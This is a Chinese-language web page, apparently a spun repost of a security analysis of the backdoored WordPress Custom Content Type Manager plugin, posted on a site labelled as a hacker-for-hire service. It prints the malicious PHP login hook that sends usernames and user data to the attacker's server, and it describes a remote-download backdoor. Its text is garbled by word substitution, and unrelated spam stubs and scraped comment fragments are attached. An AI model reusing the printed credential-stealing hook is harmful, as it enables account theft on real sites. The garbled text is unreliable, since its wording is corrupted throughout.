当前位置:首页 > 黑客业务 > 正文内容

WordPress 自定义内容类型办理插件(CCTM)存在后门,可盗取办理员账号密码

访客4年前 (2021-04-15)黑客业务696

据悉, Sucuri安全团队研讨人员近来指出WordPress一款插件(自界说内容办理)CCTM存在后门。经过该后门,能够对WordPress上的中心文件进行篡改,以此记载并盗取感染站点办理员用户的登录账号及暗码。
Freebuf 百科
自界说内容办理( Custom Content Type Manager)插件的功用
自界说内容类型办理(CCTM)答应用户创立自界说内容类型(也称为文章类型),也能够对每个下拉菜单、复选框和图画甚至于其他元素,供给标准化的自界说区域,这赋予了WordPress内容办理的功用。这个插件还答应导出和导入用户的内容界说,使得它易于在多个站点之间确保相似的结构。
假设想为博客增加一个独自的部分来宣布电影谈论。经过运用自界说文章类型,你能够创立一种新的文章类型,就像文章(posts)和页面(pages)相同,它能够包含一组不同的数据。比方新的办理菜单、专门的修改页面、自界说分类 和 更多有用的发布办理功用。自界说文字类型 具有新的文章办理选项,就像默许的文章类型(文章、页面、附件 )相同。一种 自界说文章类型 能够存储各式各样的信息。它有专门的修改器、多媒体上传 并运用WordPress现有的表结构,便于数据办理。
后门的发现
此事情是由Sucuri安全团队(一个专门供给web安全服务的团队)初次进行追寻剖析的。据Sucuri安全研讨人员说到,
一开始他们是在其客户处发现一个命名古怪的文件 (auto-update.php),而起先并没发现有可疑行为,直到该插件进行更新的时分。
Sucuri安全团队说到当他们在为客户铲除一个感染站点时,发现了一个可疑的文件auto-update.php,该文件是被存放在wp-content/plugins/custom-content-type-manager/.的途径下。详细如下图,

 
据研讨剖析,该后门程序,能从一个地址为http://wordpresscore .com/plugins/cctm/update/ 的服务端下载文件,并将它们保存为.php格局存放在插件装备目录下。
该插件既是上述说到的 Custom Content Type Manager (CCTM),在曩昔三年里该插件首要用于创立自界说文章类型,现在现已积累了必定的用户数量,据初步统计现在现已在超越10,000个站点上装置了该插件。
插件疑云,奥秘的办理者
从 Sucuri安全团队两个星期的查询来看,该插件在曩昔的10个月将近一年看起来像一个被抛弃的项目,并无任何更新,但是近期奥秘地更换了办理者。而该名名为wooranker的新开发者随后更新了插件,发布了一个新的版别。
咱们在官方插件目录中找到的每一个WordPress插件,都是经过子版别存储库进行晋级的。在问题盯梢体系的协助下,任何人都能够运用该存储库去搜索相应的信息(包含像方针,时刻以及改变事项等)在恣意插件的恣意版别中。比方,下图为近期CCTM更改的状况,

咱们能够从上面截图看到,其间的一次更改是于2019年2月18日增加了auto-update.php文件。在此次更新中,“wooranker”改动并增加了下面的描述信息,
“新办理者的小改动”(保存原始语法)
实际上,从上述截图中咱们能够看到,两个星期前该插件依然由fireproofsocks在保持更新,但之后其间的一项变化的描述为“将wooranker增添到readme中”,再到后边就变成wooranker在对该插件进行更新了。
或许该插件开发者现已对其失掉爱好,又或许受雇于wooranker。另一方面,由于实际上fireproofsocks现已将近一年没对该插件进行更新了,咱们也估测是否 wooranke侵略了fireproofsocks的账户,随后增添了本身作为新的办理者。
此外,在2019年2月5日,wooranker也一起加入到 Postie插件项目中。而其在Postie插件项目的变化都为合法可查的,而且都由Postie插件的初始发起人赞同。这一切看起来却有点令人摸不清脑筋。那么接下来让咱们来看看更新的歹意CCTM插件及wooranker 怎么运用它侵略站点的。
自界说内容办理(CCTM)插件 0.9.8.8 版别存在歹意代码
而该名开发者关于更新的版别赋予了其新的“使命”。首要,新的版别如上述所看到的,增加了auto-update.php的文件,而据研讨剖析,该文件可从长途的服务器下载指定文件到受感染的站点。
经过Trac咱们也看到了(于2月19日最终更新)。它增加了/includes/CCTM_Communicator.php文件(该文件会与auto-update.php联合运转,其首要的使命为ping wooranker的服务器端然后使得服务器能记载新感染的站点IP地址等信息。)以及将下述的代码段刺进到插件的index.php文件中。
// Send plugin information when user loginfunction _wp_login_eventhandler($user_login, $user) {require_once('includes/CCTM_Communicator.php');$_objCCTMCom = new CCTM_Communicator();$_objCCTMCom->addInfo(array($user_login, $user));$_objCCTMCom->send_info();}add_action('wp_login', '_wp_login_eventhandler', 10, 2);
详细更改如下图,

 
该段代码作用为每逢用户登录到WordPress站点时,将站点及用户的信息发送到wooranker的服务器(wordpresscore .com)上。
进犯途径重演
经过在受感染的站点上拜访登陆,完成对进犯的回溯。
于2月28日,从源地址104.131.27.120发起了测验运用Python脚本 (“python-requests/2.2.1 CPython/2.7.6 Linux/3.13.0-79-generic“)登录到WordPress。该站点的地址明显地经过新的CCTM_Communicator功用来获取的。
依据对受感染站点的监测,某次 wooranker妄图登陆到一个受感染的站点,但由于站点办理员更改了登陆的URL,所以 wooranker未能成功侵略站点。随后看到测验登陆受阻,wooranker也随即更改了战略。其使用auto-update.php后门,强制方针站点下载并装置别的一个名为c.php的文件,该文件首要用于创立另一名为wp-options.php的文件。后者首要用于篡改WordPress的中心文件。据研讨发现,遭受篡改的首要有三个文件,

[1] [2]  黑客接单网

扫描二维码推送至手机访问。

版权声明:本文由黑客接单发布,如需转载请注明出处。

本文链接:https://therlest.com/105936.html

分享给朋友:

“WordPress 自定义内容类型办理插件(CCTM)存在后门,可盗取办理员账号密码” 的相关文章

华流芒种是几月几号农历

芒种是二十四节气之一,大家对于二十四节气也已经非常熟悉了,但是芒种是哪一天还不是很清楚,今年的芒种是阳历6月5日,那么2020年芒种是农历几月几号呢?接下来我们就一起了解一下吧。     2020年芒种是农历几月几号...

字节承认商业化团队撤城裁员了

据晋江新闻网2021年10月19日21:00:43的最新发布,微博网友@ 爆料。   平安夜来临之际,事件,在网上炒得沸沸扬扬,引发全网热议!   据悉,黑客追款后来被报道了几次。猜测第六百八十八章逃港者第六百八十九章调侃第六百。相对这个账号是他的。   1.专业网赌追回...

字节承认商业化团队撤城裁员

据晋江新闻网2021年10月19日21:00:43的最新发布,微博网友@ 爆料。 平安夜来临之际,事件,在网上炒得沸沸扬扬,引发全网热议! 据悉,黑客追款后来被报道了几次。猜测第六百八十八章逃港者第六百八十九章调侃第六百。相对这个账号是他的。 1.专业网赌追回律师 首先确保整个真正的黑客追款方案是最...

猪肉怎么选?颜色有区别吗?今天做饭的时候发现上次买的猪肉颜色跟这

猪肉怎么选?颜色有区别吗?今天做饭的时候发现上次买的猪肉颜色跟这 买猪肉时,根据肉的颜色、外观、气味等可以判断出肉的质量是好还是坏。优质的猪肉,脂肪白而硬,且带有香味。肉的外面往往有一层稍带干燥的膜,肉质紧密,富有弹性,手指压后凹陷处立即复原。 次鲜肉肉色较鲜肉暗,缺乏光泽,脂肪呈灰白色;表面带...

蚯蚓的市场价格 - 2020年蚯蚓收购价格

今年2020年这个价格还算是比较合理,市场价格较为平稳,当地蚯蚓批发价250元/万条,今日浙江海宁地区鲜蚯蚓批发价为17,最高可卖3元/两,每次都-是老家亳州的来回辗转的跑辛苦.货源充足,现在贩子登门收购18-222020元/斤不等。 目前价格多少钱一斤目前价格在8元一斤,是一种营养价值很高的无脊椎...

中铁快运寄件电话 - 中铁快运官方网站

尽快前去领取吧,查询可以来我们,包裹已经到石家庄了,告诉对方所寄何物。广木头箱子费用在及时上百不等。 .网站“中铁快运单号查询系统”留言查询,开始不知道。 中铁快运的,且电话通知无人接听,但是价格也很贵。在哪里寄,中铁快运,电话多少中铁。 打了个电话,K54,徐州中铁快运,你好,木头箱子中铁能提供。...

评论列表

野欢诤友
2年前 (2022-07-04)

改器、多媒体上传 并运用WordPress现有的表结构,便于数据办理。后门的发现此事情是由Sucuri安全团队(一个专门供给web安全服务的团队)初次进行追寻剖析的。据Sucuri安全研讨人员说到

泪灼依疚
2年前 (2022-07-04)

的描述为“将wooranker增添到readme中”,再到后边就变成wooranker在对该插件进行更新了。 或许该插件开发者现已对其失掉爱好,又或许受雇于wooranker。另一方面,由于实际上fireproofsocks现已将近一年没对该插件进行更新

依疚轻禾
2年前 (2022-07-04)

作用为每逢用户登录到WordPress站点时,将站点及用户的信息发送到wooranker的服务器(wordpresscore .com)上。进犯途径重演经过在受感染的站点上拜访登陆,完成对进犯的回

痴妓咽渡
2年前 (2022-07-04)

新的“使命”。首要,新的版别如上述所看到的,增加了auto-update.php的文件,而据研讨剖析,该文件可从长途的服务器下载指定文件到受感染的站点。经过Trac咱们也看到了(于2月19日最终更新)。它增加了/inclu

弦久颜于
2年前 (2022-07-04)

ns.php的文件。后者首要用于篡改WordPress的中心文件。据研讨发现,遭受篡改的首要有三个文件,[1] [2]  黑客接单网

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。